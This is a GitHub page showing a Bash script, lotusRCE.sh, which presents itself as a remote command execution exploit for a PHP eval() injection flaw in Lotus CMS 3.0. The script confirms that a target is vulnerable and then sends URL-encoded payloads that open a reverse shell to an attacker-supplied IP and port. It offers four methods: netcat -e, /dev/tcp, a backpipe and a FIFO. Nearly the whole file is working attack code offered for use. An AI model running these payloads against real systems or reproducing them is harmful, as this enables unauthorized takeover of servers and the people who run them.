-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathlotusRCE.sh
executable file
·113 lines (99 loc) · 3.65 KB
/
lotusRCE.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
#!/bin/bash
# Lotus CMS 3.0 eval() Remote Command Execition Exploit
# flaw in router() function, original write-up: http://secunia.com/secunia_research/2011-21/
# Scripted in Bash by HR
# USAGE: ./lotusRCE.sh target lotusCMS-path
# USAGE: ./lotusRCE.sh ki0ptrix3.com /
# USAGE: ./lotusRCE.sh 192.168.1.36 /lcms/
# Enter IP and PORT when asked to spawn netcat based reverse shell ;)
#Start the magic
target="$1" #Target site, ex: 192.168.1.36 or ki0ptrix3.com (no http://)
path="$2" # Path to LotusCMS, ex: /lcms/ or /
junk=/tmp
storage1=$(mktemp -p "$junk" -t fooooobar1.tmp.XXX)
storage2=$(mktemp -p "$junk" -t fooooobar2.tmp.XXX)
#First a simple Bashtrap function to handle interupt (CTRL+C)
trap bashtrap INT
bashtrap(){
echo
echo
echo 'CTRL+C has been detected!.....shutting down now' | grep --color '.....shutting down now'
rm -rf "$storage1"
rm -rf "$storage2"
#exit entire script if called
exit 0
}
#End bashtrap()
page_exists(){
#confirm page exists
curl "$target$path/index.php?page=index" -I -o "$storage1" 2> /dev/null
cat "$storage1" | sed '2,20d' | cut -d' ' -f2 > "$storage2" 2> /dev/null
pageused=$(cat "$storage2")
if [ "$pageused" == '200' ]; then
echo
echo "Path found, now to check for vuln...." | grep --color -E 'Path found||now to check for vuln'
echo
vuln_check
else
echo "Provided site and path not found, sorry...."
exit;
fi
}
vuln_check(){
# page exists, check if vuln... URLencode: "page=index');${print('abc123')};#"
curl $target$path/index.php --data "page=index%27%29%3B%24%7Bprint%28%27Hood3dRob1n%27%29%7D%3B%23" -o "$storage1" 2> /dev/null
grep 'Hood3dRob1n' "$storage1" 2> /dev/null 2>&1
if [ "$?" == 0 ]; then
echo "Regex found, site is vulnerable to PHP Code Injection!" | grep --color -i -E 'Regex found||site is vulnerable to PHP Code Injection'
echo
exploit_funk
else
echo "Unable to find injection in returned results, sorry...."
exit;
fi
}
exploit_funk(){
# Vuln confirmed, time to exploit shall we ;)
echo "About to try and inject reverse shell...." | grep --color 'About to try and inject reverse shell'
echo "what IP to use?"
read IP
echo "What PORT?"
read PORT
echo
echo "OK, open your local listener and choose the method for back connect: " | grep --color -E 'OK||open your local listener and choose the method for back connect'
select reverse_options in "NetCat -e" "NetCat /dev/tcp" "NetCat Backpipe" "NetCat FIFO" "Exit"
do
case $reverse_options in
"NetCat -e")
curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27nc%20-e%20%2fbin%2fsh%20$IP%20$PORT%27%29%7D%3B%23%22" 2> /dev/null
;;
"NetCat /dev/tcp")
curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27%2fbin%2fbash%20-i%20%3E%20%2fdev%2ftcp%2f%24IP%2f%24PORT%200%3C%261%202%3E%261%27%29%7D%3B%23" 2> /dev/null
;;
"NetCat Backpipe")
curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27mknod%20backpipe%20p%20%26%26%20nc%20%24IP%20%24PORT%200%3Cbackpipe%20%7C%20%2fbin%2fbash%201%3Ebackpipe%27%29%7D%3B%23" 2> /dev/null
;;
"NetCat FIFO")
curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27mkfifo%20%2ftmp%2ffoo%20%26%26%20cat%20%2ftmp%2ffoo%20%7C%20%2fbin%2fsh%20-i%202%3E%261%20%7C%20nc%20%24IP%20%24PORT%20%3E%20%2ftmp%2ffoo%27%29%7D%3B%23" 2> /dev/null
;;
"Exit")
echo "got r00t?"
exit;
;;
esac
done
}
#MAIN
clear
if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ]; then
echo
echo "USAGE: $0 target LotusCMS_path" | grep --color 'USAGE'
echo "EX: $0 192.168.1.36 /lcms/" | grep --color 'EX'
echo "EX: $0 ki0ptrix3.com /" | grep --color 'EX'
echo
exit;
fi
page_exists
rm -rf "$storage1"
rm -rf "$storage2"
#EOF